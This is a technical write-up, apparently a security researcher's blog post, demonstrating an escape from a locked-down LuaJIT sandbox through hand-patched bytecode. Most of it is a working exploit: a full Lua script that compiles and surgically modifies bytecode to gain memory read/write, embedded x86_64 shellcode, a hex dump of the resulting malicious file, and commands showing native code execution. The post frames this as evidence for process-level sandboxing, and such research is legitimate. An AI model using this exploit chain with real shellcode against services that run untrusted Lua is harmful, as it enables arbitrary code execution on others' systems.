I have previously written about how malicious bytecode can be used to escape from a Lua 5.1 sandbox on 32-bit Windows, and other people have applied the same methods to attack redis instances.
It should come as no surprise that LuaJIT (as opposed to plain PUC-Rio non-JIT Lua) also has bytecode which can be used to escape from sandboxes, but it is nevertheless illustrative to work through the details of a full sandbox escape. The conclusion, as should be accepted knowledge by now, is that Lua should be sandboxed at the operating-system-process level, as opposed to at the Lua level.
For the purposes of this exercise, we'll escape from the following sandbox:
#include <lauxlib.h>
#include <lualib.h>
int main() {
lua_State* L = luaL_newstate();
lua_cpcall(L, luaopen_jit, NULL);
luaL_dofile(L, "evil.lua");
lua_close(L);
}
The sandbox executes arbitrary Lua code of our choice (the evil.lua
file), and our aim is to escalate up to executing arbitrary native code of our choice. If the sandbox exposed LuaJIT's standard ffi
library, then this would be trivial: call ffi.cdef
to declare a prototype for mprotect
(or VirtualProtect
on Windows), call mprotect
on some shellcode to make it executable, call ffi.cast
to get a function pointer for the shellcode, and then call the function pointer. Of course, the sandbox does not expose the ffi
library - nor does it expose the base library (hence no tostring
or print
or etc.) or the package library (no require
) or the string library (no string manipulation) or any other useful library. As its sole concession, the sandbox does load the jit
library, as this library must be loaded in order for LuaJIT to actually do JIT compilation.
The particular environment we'll attack is LuaJIT commit 4f87367b
(head of the v2.1
branch at time of writing), running on an x86_64 flavour of either Mac OSX or Linux, and compiled with LJ_64=1
and LJ_GC64=0
and LJ_FR2=0
(these being the current defaults for LuaJIT on x86_64).
The evil.lua
file that we'll end up using will contain LuaJIT bytecode rather than Lua source code. Writing bytecode by hand is somewhat arduous, so instead we'll write Lua source code, compile it to bytecode, and then make a few surgical tweaks to the bytecode. The following rather long block of contains both the Lua source code to be compiled and manipulated, and the Lua source code for performing the compilation and manipulation.
local evil = function(v)
local shellcode =
"\76\139\87\16"..
"\184\4\0\0\2"..
"\191\1\0\0\0"..
"\72\141\53\51\0\0\0"..
"\186\12\0\0\0"..
"\15\5"..
"\72\133\192"..
"\184\74\0\0\2"..
"\121\12"..
"\184\1\0\0\0"..
"\15\5"..
"\184\10\0\0\0"..
"\73\139\58"..
"\72\139\119\8"..
"\186\7\0\0\0"..
"\15\5"..
"\73\139\114\8"..
"\72\137\55"..
"\195"..
"Hello World\n"
local function inner(...)
if false then
local cdata = -32749
cdata = 0
cdata = 0
end
local function s_byte(s) end
local function s_char(i, _) end
local function s_sub(s, i, j) end
local function resync() return 0LL end
local function s_uint32(s)
local result = 0
for i = 4, 1, -1 do
result = result * 256 + s_byte(s_sub(s, i, i))
resync()
end
return result
end
local iaddr = (inner * 2^1022 * 2^52) % 2^32
local istr = (iaddr - 4) + 2^52
istr = -32764
local pc = s_sub(istr, 5, 8)
istr = resync()
pc = s_uint32(pc)
local memory = (pc + 8) + 2^52
memory = -32758
memory = memory + 0
local function m_uint32(offs)
local result = 0
for i = offs + 3, offs, -1 do
result = result * 256 + (memory[i] % 256)
end
return result
end
local vaddr = m_uint32(m_uint32(iaddr + 24) + 16)
local function low32(tv)
v = tv
return m_uint32(vaddr)
end
local function ub4(n)
local result = ""
for i = 0, 3 do
local b = n % 256
n = (n - b) / 256
result = result .. s_char(b)
resync()
end
return result
end
local mctab_s = "\0\0\0\0\99\4\0\0".. ub4(low32("") + 2748)
.."\0\0\0\0\0\0\0\0\0\0\0\0\5\0\0\0\255\255\255\255"
local mctab = low32(mctab_s) + 16 + 2^52
mctab = -32757
local nop4k = "\144"
for i = 1, 12 do nop4k = nop4k .. nop4k end
local ashellcode = nop4k .. shellcode .. nop4k
local asaddr = low32(ashellcode) + 16
asaddr = asaddr + 2^12 - (asaddr % 2^12)
local mcarea = mctab[1]
mctab[0] = 0
mctab[1] = asaddr / 2^52 / 2^1022
mctab[2] = mctab[1]
mctab[3] = mctab[1]
mctab[4] = 2^12 / 2^52 / 2^1022
while mctab[0] == 0 do end
local fshellcode = ub4(low32("") + 132) .."\0\0\0\0"..
ub4(asaddr) .."\0\0\0\0"
fshellcode = -32760
fshellcode(mctab[1], mcarea)
end
inner()
end
local ffi = require "ffi"
local bit = require "bit"
local BC = {KSHORT = 41, KPRI = 43}
local estr = string.dump(evil, true)
local buf = ffi.new("uint8_t[?]", #estr+1, estr)
local p = buf + 5
local function read_uleb128()
local v = p[0]; p = p + 1
if v >= 128 then
local sh = 7; v = v - 128
repeat
local r = p[0]
v = v + bit.lshift(bit.band(r, 127), sh)
sh = sh + 7
p = p + 1
until r < 128
end
return v
end
while true do
local len = read_uleb128()
if len == 0 then break end
local pend = p + len
local flags, numparams, framesize, sizeuv = p[0], p[1], p[2], p[3]
p = p + 4
read_uleb128()
read_uleb128()
local sizebc = read_uleb128()
local bc = p
local uv = ffi.cast("uint16_t*", p + sizebc * 4)
if numparams == 0 and sizeuv == 3 then
uv[0] = uv[0] + 2
for i = 0, sizebc do
if bc[0] == BC.KSHORT then
local rd = ffi.cast("int16_t*", bc)[1]
if rd <= -32749 then
bc[0] = BC.KPRI
bc[3] = 0
if rd == -32749 then
bc[4] = 0
bc[8] = 0
end
end
end
bc = bc + 4
end
elseif sizebc == 1 then
bc[0] = 147 + numparams
bc[2] = bit.band(1 + numparams, 6)
end
p = pend
end
local f = io.open("evil.lua", "wb")
f:write(ffi.string(buf, #estr))
f:close()
If we save the above as make_evil.lua
, then we can execute it to create evil.lua
:
$ luajit make_evil.lua
$ file evil.lua
evil.lua: data
$ xxd evil.lua
0000000: 1b4c 4a02 060b 0001 0100 0000 0194 0002 .LJ.............
0000010: 000b 0002 0200 0000 0195 0002 000b 0003 ................
0000020: 0300 0000 0196 0004 0012 0400 0100 0100 ................
0000030: 0228 0000 004c 0002 0002 0000 5700 010c .(...L......W...
0000040: 0300 0112 2901 0000 2902 0400 2903 0100 ....)...)...)...
0000050: 2904 ffff 4d02 0c80 1806 0001 2d07 0000 )...M.......-...
0000060: 2d08 0100 1209 0000 120a 0500 120b 0500 -...............
0000070: 4208 0400 4107 0002 2001 0706 2d06 0200 B...A... ...-...
0000080: 4206 0101 4f02 f47f 4c01 0200 00c0 02c0 B...O...L.......
0000090: 03c0 8004 3c00 0108 0100 020c 2901 0000 ....<.......)...
00000a0: 1602 0000 1203 0000 2904 ffff 4d02 0680 ........)...M...
00000b0: 1806 0101 2d07 0000 3807 0507 1a07 0107 ....-...8.......
00000c0: 2001 0706 4f02 fa7f 4c01 0200 0880 0680 ...O...L.......
00000d0: 041d 0001 0303 0000 042e 0000 002d 0101 .............-..
00000e0: 002d 0202 0044 0102 0001 0009 c00a c052 .-...D.........R
00000f0: 0001 0a02 0101 1127 0100 0029 0200 0029 .......'...)...)
0000100: 0303 0029 0401 004d 020b 801a 0600 0021 ...)...M.......!
0000110: 0706 0019 0000 0712 0701 002d 0800 0012 ...........-....
0000120: 0906 0042 0802 0226 0108 072d 0701 0042 ...B...&...-...B
0000130: 0701 014f 02f5 7f4c 0102 0001 c003 c005 ...O...L........
0000140: 8004 9f04 0700 1703 0d0c 7158 0000 8058 ..........qX...X
0000150: 0003 802b 0013 0000 0000 0000 0000 0033 ...+...........3
0000160: 0000 0033 0101 0033 0202 0033 0303 0033 ...3...3...3...3
0000170: 0404 002d 0500 0018 0500 0518 0501 051a ...-............
0000180: 0502 0517 0603 0516 0601 062b 0604 0012 ...........+....
0000190: 0702 0012 0806 0029 0905 0029 0a08 0042 .......)...)...B
00001a0: 0704 0212 0803 0042 0801 0212 0608 0012 .......B........
00001b0: 0804 0012 0907 0042 0802 0212 0708 0016 .......B........
00001c0: 0804 0716 0801 082b 080a 0016 0805 0833 .......+.......3
00001d0: 0905 0012 0a09 0012 0b09 0016 0c06 0542 ...............B
00001e0: 0b02 0216 0b07 0b42 0a02 0233 0b06 0033 .......B...3...3
00001f0: 0c07 0027 0d08 0012 0e0c 0012 0f0b 0027 ...'...........'
0000200: 1009 0042 0f02 0216 0f08 0f42 0e02 0227 ...B.......B...'
0000210: 0f0a 0026 0d0f 0d12 0e0b 0012 0f0d 0042 ...&...........B
0000220: 0e02 0216 0e07 0e16 0e01 0e2b 0e0b 0027 ...........+...'
0000230: 0f0b 0029 1001 0029 110c 0029 1201 004d ...)...)...)...M
0000240: 1004 8012 140f 0012 150f 0026 0f15 144f ...........&...O
0000250: 10fc 7f12 100f 002d 1102 0012 120f 0026 .......-.......&
0000260: 1012 1012 110b 0012 1210 0042 1102 0216 ...........B....
0000270: 1107 1116 1209 111a 1309 1121 1113 123a ...........!...:
0000280: 1201 0e29 1300 003e 1300 0e19 1301 1119 ...)...>........
0000290: 1300 133e 1301 0e3a 1301 0e3e 1302 0e3a ...>...:...>...:
00002a0: 1301 0e3e 1303 0e2a 130a 003e 1304 0e3a ...>...*...>...:
00002b0: 1300 0e09 1305 0058 1302 8055 1301 8058 .......X...U...X
00002c0: 13fb 7f12 130c 0012 140b 0027 1509 0042 ...........'...B
00002d0: 1402 0216 140b 1442 1302 0227 140c 0012 .......B...'....
00002e0: 150c 0012 1611 0042 1502 0227 160c 0026 .......B...'...&
00002f0: 1316 132b 1308 0012 1413 003a 1501 0e12 ...+.......:....
0000300: 1612 0042 1403 0132 0000 804b 0001 0004 ...B...2...K....
0000310: c000 8001 c009 0000 0000 0690 1900 0000 ................
0000320: 0000 0000 0000 0000 0005 0000 00ff ffff ................
0000330: ff05 0d00 0000 0063 0400 0000 0000 0000 .......c........
0000340: 0000 0001 8080 c0fe 0701 8080 c099 0401 ................
0000350: 8080 c08f 0408 1000 3020 f82a 8040 8140 ........0 .*.@.@
0000360: 0088 02d2 0105 0115 0013 001a 2701 0000 ............'...
0000370: 2702 0100 2703 0200 2704 0300 2705 0400 '...'...'...'...
0000380: 2706 0500 2707 0600 2708 0700 2709 0800 '...'...'...'...
0000390: 270a 0900 270b 0500 270c 0a00 270d 0b00 '...'...'...'...
00003a0: 270e 0c00 270f 0d00 2710 0500 2711 0e00 '...'...'...'...
00003b0: 2712 0f00 2713 1000 2714 1100 2601 1401 '...'...'...&...
00003c0: 3302 1200 1203 0200 4203 0101 3200 0080 3.......B...2...
00003d0: 4b00 0100 0011 4865 6c6c 6f20 576f 726c K.....Hello Worl
00003e0: 640a 06c3 0848 8937 0949 8b72 080a ba07 d....H.7.I.r....
00003f0: 0000 0009 488b 7708 0849 8b3a 0ab8 0a00 ....H.w..I.:....
0000400: 0000 0ab8 0100 0000 0779 0c0a b84a 0000 .........y...J..
0000410: 0208 4885 c007 0f05 0aba 0c00 0000 0c48 ..H............H
0000420: 8d35 3300 0000 0abf 0100 0000 0ab8 0400 .53.............
0000430: 0002 094c 8b57 1000 ...L.W..
We can then run evil.lua
either in our sandbox, or in luajit
proper. Let's start with the latter:
$ luajit evil.lua
Hello World
Running evil.lua
in our sandbox first requires that we compile and build the sandbox. Ensuring that you link against the correct version of LuaJIT can be fiddly, as can forcing the correct address space layout on OSX. Once your environment is set up correctly, this can be as simple as:
$ gcc sandbox.c -lluajit # On OSX, also pass:
# -pagezero_size 10000
# -image_base 100000000
$ ./a.out
Hello World
With that, we've seen that malicious LuaJIT bytecode can be used to escape from the tightest of Lua-level sandboxes, and result in arbitrary native code execution.